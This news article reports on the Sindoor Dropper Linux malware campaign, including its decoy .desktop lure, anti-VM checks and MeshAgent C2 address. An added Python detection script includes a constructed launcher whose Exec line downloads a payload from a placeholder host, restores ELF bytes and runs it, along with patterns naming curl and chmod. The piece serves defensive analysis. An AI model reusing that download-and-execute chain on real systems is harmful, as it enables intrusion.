Red Hot Cyber


Sindoor Dropper: The Malware Using the India-Pakistan Clash to Infect Linux

Redazione RHC: 31 August 2025 10:04

An insidious malware campaign known as “Sindoor Dropper” targets Linux operating systems, combining spear-phishing with a complex, multi-stage infection process. The operation baits users with lures related to the recent Pakistan-India conflict, known as Operation Sindoor, to trick them into opening malicious files.

The Sindoor Dropper campaign highlights an evolution in threat actors’ attack techniques, demonstrating a clear focus on Linux environments, which are less targeted by phishing campaigns.

The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop”, which masquerades as a regular PDF document. According to Nextron’s analysis, once executed it opens a benign decoy PDF to maintain the illusion of legitimacy, while silently launching a complex and heavily obfuscated infection process in the background.

The .desktop file, Nextron reports, downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd). A distinctive trait of this activity is the weaponization of .desktop files, a technique previously attributed to APT36 (also known as Transparent Tribe or Mythic Leopard), a group that specializes in advanced persistent threat operations.

The infection chain was designed to evade both static and dynamic analysis. At the time of its discovery, the initial payload had left no trace on VirusTotal and so remained undetected. The decryptor, a UPX-compressed Go binary, is deliberately corrupted by removing its ELF magic bytes, presumably to bypass security scans on platforms such as Google Docs. The .desktop file restores these bytes on the victim’s computer to make the binary executable again.
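A defender-side check for the two traits described above, a document-looking .desktop launcher and an ELF whose magic bytes have been stripped, written as an added example in Python; it is not from the article or from Nextron, and the sample launcher, its placeholder host and the ELF header bytes are constructed for the demonstration:

```python
import re
import struct

ELF_MAGIC = b"\x7fELF"
KNOWN_MACHINES = {0x03, 0x28, 0x3E, 0xB7}  # x86, arm, x86-64, aarch64

def _elf_ident_ok(data: bytes, p: int) -> bool:
    """True if data[p:] looks like e_ident[4:] (class, data, version) plus a sane e_type/e_machine."""
    if len(data) < p + 16 or data[p] not in (1, 2) or data[p + 1] not in (1, 2) or data[p + 2] != 1:
        return False
    e_type, e_machine = struct.unpack_from(("<" if data[p + 1] == 1 else ">") + "HH", data, p + 12)
    return e_type in (2, 3) and e_machine in KNOWN_MACHINES  # ET_EXEC / ET_DYN on a known arch

def elf_header_state(data: bytes) -> str:
    """'elf', 'headerless-elf' (magic zeroed in place or cut off the front), or 'other'."""
    if data[:4] == ELF_MAGIC:
        return "elf"
    if _elf_ident_ok(data, 4) or _elf_ident_ok(data, 0):
        return "headerless-elf"
    return "other"

# Red flags for .desktop launchers: (where to look, pattern, meaning).
DESKTOP_RED_FLAGS = [
    ("name", r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", "document extension hidden before .desktop"),
    ("exec", r"\b(curl|wget)\b", "Exec= downloads content"),
    ("exec", r"(\\x7f|\\177)ELF", "Exec= writes the ELF magic bytes"),
    ("exec", r"\bchmod\s+\+x\b", "Exec= makes a file executable"),
]

def desktop_red_flags(filename: str, text: str) -> list[str]:
    """Return the meaning of every red flag matched by a .desktop file's name or Exec= line."""
    exec_line = next((l[5:] for l in text.splitlines() if l.startswith("Exec=")), "")
    hits = []
    for where, pattern, meaning in DESKTOP_RED_FLAGS:
        if re.search(pattern, filename if where == "name" else exec_line, re.I):
            hits.append(meaning)
    return hits

# Constructed sample launcher mirroring the behaviour described above; the host is a placeholder.
SAMPLE_NAME = "Note_Warfare_Ops_Sindoor.pdf.desktop"
SAMPLE_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=Note_Warfare_Ops_Sindoor.pdf\n"
    "Exec=sh -c \"xdg-open decoy.pdf; curl -s http://placeholder.invalid/m -o /tmp/m;"
    " printf '\\x7fELF' | cat - /tmp/m > /tmp/x; chmod +x /tmp/x; /tmp/x\"\n"
)
# Constructed 64-byte x86-64 ELF header (ET_EXEC) and the two ways its magic can be 'removed'.
SAMPLE_ELF = ELF_MAGIC + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 2, 0x3E) + bytes(44)
ZEROED_MAGIC = bytes(4) + SAMPLE_ELF[4:]
TRUNCATED_MAGIC = SAMPLE_ELF[4:]
```

Run `desktop_red_flags(SAMPLE_NAME, SAMPLE_DESKTOP)` and `elf_header_state(...)` on the three header variants to see every flag fire on the lure and both corrupted headers classified as headerless ELF; point the same functions at `~/Downloads` and `/tmp` contents to hunt for the real thing.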

This initiates a multi-stage process in which each component decrypts and executes the next. The chain includes basic anti-VM checks, such as verifying adapter names and vendors, blacklisting specific MAC address prefixes, and monitoring machine uptime.

The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command and control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.

This gives the attacker full remote access to the compromised system, allowing them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
